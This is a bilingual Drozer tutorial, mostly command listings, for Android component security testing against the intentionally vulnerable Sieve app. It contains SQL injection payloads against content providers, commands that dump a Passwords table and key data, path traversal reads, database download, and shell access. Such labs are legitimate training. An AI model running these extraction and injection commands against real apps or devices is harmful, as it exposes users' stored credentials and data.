Installation and startup of the Drozer tool: source code address (https://github.com/mwrlabs/drozer/) 1.
Installation
(1) Download https://www.mwrinfosecurity.com/products/drozer/community-edition/Mac
You can download the python version
(2) Install drozer on the PC:
sudo easy_install --allow-hosts pypi.python.org protobuf==2.4.1
easy_install twisted==10.2.0 (to support Infrastructure mode)
sudo easy_install ./drozer -2.3.4-py2.7.egg
(3) Install agent.apk on the Android device
adb install agent.apk
2. Start
(1) Use adb on the PC for port forwarding, and forward to the port used by Drozer ❝31415
adb forward tcp:31415 tcp:31415
(2) Open the Drozer Agent on the Android device and select embedded server-enabled
(3) Open the Drozer Console on the PC
drozer console connect
1. Android component security testing
1. Get the package name
dz > run app.package.list -f sieve
com.mwr.example.sieve
2. Get the basic information of the app
run app.package.info -a com.mwr.example.sieve
3. Determine the attack surface
run app.package.attacksurface com.mwr.example.sieve
4.Activity
(1) Get activity information
run app.activity.info -a com.mwr.example.sieve
(2) Start the activity
run app.activity.start --component com.mwr.example.sieve
dz> help app.activity.start
usage: run app.activity.start -h --action ACTION --category CATEGORY
--component PACKAGE COMPONENT --data-uri DATA_URI
--extra TYPE KEY VALUE [--flags FLAGS FLAGS ...]
--mimetype MIMETYPE
5.Content Provider
(1) Get Content Provider information
run app.provider.info -a com.mwr.example.sieve
(2) Content Providers (data leakage)
First get all accessible Uri:
run scanner.provider.finduris -a com.mwr.example.sieve
Get data for each Uri:
run app.provider.query
content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
query data indicates that there is a vulnerability
(3) Content Providers (SQL injection)
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
报错则说明存在SQL注入。
列出所有表:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM SQLITE_MASTER WHERE type='table';-"
获取某个表(如Key)中的数据:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ -projection "* FROM Key;-"
(4)同时检测SQL注入和目录遍历
run scanner.provider.injection -a com.mwr.example.sieve
run scanner.provider.traversal -a com.mwr.example.sieve
6.Service
(1)获取service详情
run app.service.info -a com.mwr.example.sieve
不使用drozer启动service
am startservice --n 包名/service名
7.Broadcast Receiver
app.broadcast.info 获取broadcast receivers信息
app.broadcast.send 通过intent发送broadcast receiver
全部命令:
list //列出目前可用的模块,也可以使用ls > help app.activity.forintent //查看指定模块的帮助信息 > run app.package.list //列出android设备中安装的app > run app.package.info -a com.android.browser //查看指定app的基本信息 > run app.activity.info -a com.android.browser //列出app中的activity组件 > run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com //开启一个activity,例如运行浏览器打开谷歌页面 > run scanner.provider.finduris -a com.sina.weibo //查找可以读取的Content Provider > run app.provider.query content://settings/secure --selection "name='adb_enabled'" //读取指定Content Provider内容 > run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo //列出指定文件路径里全局可写/可读的文件 > run shell.start //shell操作 > run tools.setup.busybox //安装busybox > list auxiliary //通过web的方式查看content provider组件的相关内容 > help auxiliary.webcontentresolver //webcontentresolver帮助 > run auxiliary.webcontentresolver //执行在浏览器中以http://localhost:8080即可访问 以sieve示例 > run app.package.list -f sieve //查找sieve应用程序 > run app.package.info -a com.mwr.example.sieve //显示app.package.info命令包的基本信息 > run app.package.attacksurface com.mwr.example.sieve //确定攻击面 > run app.activity.info -a com.mwr.example.sieve //获取activity信息 > run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList //启动pwlist > run app.provider.info -a com.mwr.example.sieve //提供商信息 > run scanner.provider.finduris -a com.mwr.example.sieve //扫描所有能访问地址 >run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical //查看DBContentProvider/Passwords这条可执行地址 > run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'" //检测注入 > run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts //查看读权限数据 > run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据 > run scanner.provider.injection -a com.mwr.example.sieve //扫描注入地址 > run scanner.provider.traversal -a com.mwr.example.sieve > run app.service.info -a com.mwr.example.sieve //查看服务